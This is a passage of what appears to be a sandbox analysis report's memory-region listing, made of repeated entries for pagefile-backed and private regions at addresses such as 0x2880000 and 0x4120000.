monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 8560 start_va = 0x4120000 end_va = 0x413dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 8561 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8562 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8563 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8564 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8565 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8566 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8567 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8568 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8569 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8570 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8571 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8572 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8573 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8574 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8575 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8576 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8577 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8578 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8579 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8580 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8581 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8582 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8583 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8584 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8585 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8586 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8587 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8588 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8589 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8590 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8591 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8592 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8593 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8594 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8595 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8596 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8597 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8598 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8599 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8600 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8601 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8602 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8603 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8604 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8605 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8606 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8607 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8608 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8609 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8610 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8611 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8612 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8613 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8614 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8615 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8616 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8617 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8618 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8619 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8620 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8621 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8622 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8623 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8624 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8625 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8626 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8627 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8628 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8629 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8630 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8631 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8632 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8633 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8634 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8635 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8636 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8637 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8638 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8639 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8640 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8641 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8642 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8643 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8644 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8645 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8646 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8647 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8648 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8649 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8650 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8651 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8652 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8653 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8654 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8655 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8656 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8657 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8658 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8659 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8660 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8661 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8662 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8663 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8664 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8665 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8666 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8667 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 8668 start_va = 0x4120000 end_va = 0x413dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 8669 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8670 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8671 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8672 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8673 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8674 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8675 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8676 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8677 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8678 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8679 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8680 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8681 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8682 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8683 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8684 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8685 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8686 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8687 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8688 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8689 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8690 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8691 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8692 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8693 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8694 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8695 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8696 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8697 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8698 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8699 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8700 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8701 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8702 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8703 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8704 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8705 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8706 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8707 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8708 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8709 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8710 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8711 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8712 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8713 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8714 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8715 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8716 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8717 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8718 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8719 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8720 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8721 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8722 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8723 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8724 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8725 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8726 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8727 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8728 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8729 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8730 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8731 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8732 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8733 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8734 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8735 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8736 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8737 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8738 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8739 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8740 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8741 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8742 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8743 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8744 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8745 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8746 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8747 start_va = 0x2880000 